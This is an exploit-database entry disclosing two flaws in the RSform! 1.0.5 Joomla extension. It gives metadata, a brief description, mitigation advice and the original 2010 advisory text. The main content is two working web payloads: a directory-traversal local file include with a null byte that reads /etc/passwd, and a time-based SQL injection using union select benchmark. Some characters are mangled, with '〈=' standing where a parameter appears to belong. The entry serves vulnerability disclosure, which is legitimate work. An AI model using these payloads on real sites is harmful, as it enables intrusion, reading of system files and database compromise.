header-logo
Suggest Exploit
vendor:
RSform!
by:
jdc
7,5
CVSS
HIGH
Local File Include and SQL Injection
22, 89
CWE
Product Name: RSform!
Affected Version From: 1.0.5
Affected Version To: 1.0.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

RSform! 1.0.5 (Joomla) Multiple Vulnerabilities

RSform! 1.0.5 (Joomla) is vulnerable to Local File Include and SQL Injection. The Local File Include vulnerability can be exploited by appending '?option=com_forme〈=../../../../../../../../../etc/passwd%00' to the URL. The SQL Injection vulnerability can be exploited by appending '?option=com_forme〈=-1' union select benchmark(1000000,md5(1)) -- ' to the URL. RSform! Pro is not affected.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in SQL queries. Ensure that the application is not vulnerable to directory traversal attacks.
Source

Exploit-DB raw data:

# Exploit Title: RSform! 1.0.5 (Joomla) Multiple Vulnerabilities
# Date: 06.11.2010
# Author: jdc
# Software Link: 
http://extensions.joomla.org/extensions/contacts-and-feedback/forms/2265
# Version: 1.0.5

Local File Include
------------------
?option=com_forme
〈=../../../../../../../../../etc/passwd%00

SQL Injection
-------------
?option=com_forme
〈=-1' union select benchmark(1000000,md5(1)) -- '

NOTE: RSform! Pro is not affected...

6 Nov 2010
jdc